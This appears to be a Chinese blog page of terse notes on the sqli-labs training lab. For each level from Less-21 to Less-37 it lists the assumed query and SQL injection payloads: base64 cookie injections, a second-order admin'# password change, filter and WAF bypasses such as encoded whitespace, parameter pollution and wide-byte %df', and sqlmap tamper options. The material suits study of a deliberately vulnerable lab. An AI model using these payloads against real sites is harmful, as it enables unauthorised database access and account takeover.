zoukankan      html  css  js  c++  java
  • sqli-labs(advanced)

    (base64加密)

    Less-21:

    select * from table where cookie=('cookie');
    admin') and sleep(5)#>>YWRtaW4nKSBhbmQgc2xlZXAoNSkj
    sqlmap --tamper base64encode.py

    Less-22:

    select * from table where cookie="cookie";
    admin" and sleep(5)#>>YWRtaW4iIGFuZCBzbGVlcCg1KSM=

    (#,--过滤)

    Less-23:

    select * from table where id='1';
    1' and 1='1



    (更改用户密码)

    Less-24:

    update table set password='test' where username='admin' and password='admin';
    创建用户admin'#
    用admin'#修改密码

    (and,or过滤)

    Less-25:

    select * from table where id='1';
    大小写
    双写
    hex,urlencode编码
    添加注释
    &&,||
    sqlmap --hex

    Less-25a:

    select * from table where id=1;

    (空格,注释过滤)

    Less-26:

    select * from table where id='1';
    %09,%0b    TAB
    %0a    新建一行
    %0c    新建一页
    %0d    return
    %a0    空格
    1'||'1构造闭合

    Less-26a:

    select * from table where id=('1');
    and(sleep(5))||('1

    Less-27:

    select * from table where id='1';

    Less-27a:

    select * from table where id="1";

    Less-28:

    select * from table where id=('1');

    Less-28a:

    select * from table where id=('1');
    如果没有回显用不同编码多试几下
    sqlmap --tamper randomcase.py space2randomblank.py

    (WAF)

    Less-29:

    select * form table where id='1';
    ?id=1&id=2' and 1=1%23

    Less-30:

    select * from table where id="1";
    sqlmap --skip-waf

    Less-31:

    select * from table where id=("1");

    (宽字节)

    Less-32:

    select * from table where id='1';
    %df' and 1=1%23
    sqlmap --tamper=unmagicquotes.py

    Less-33:

    select * from table where id='1';

    Less-34:

    select * from table where username='admin' and password='admin';

    Less-35:


    select * from table where id=1;
    and 1=1%23

    Less-36:

    select * from table where id='1';

    Less-37:

    select * from table where username='admin' and password='admin';

  • 相关阅读:
    Assert.isTrue 用法
    P2967 [USACO09DEC]视频游戏的麻烦Video Game Troubles
    最近目标2333
    LibreOJ β Round #2」贪心只能过样例
    CF1062F Upgrading Cities 拓扑排序
    CF1108F MST Unification
    CF915D Almost Acyclic Graph 拓扑排序
    Swift日历控件Calendar
    README.md的markdown语法
    MAC打开App显示已损坏
  • 原文地址:https://www.cnblogs.com/f1veseven/p/13409423.html
Copyright © 2011-2022 走看看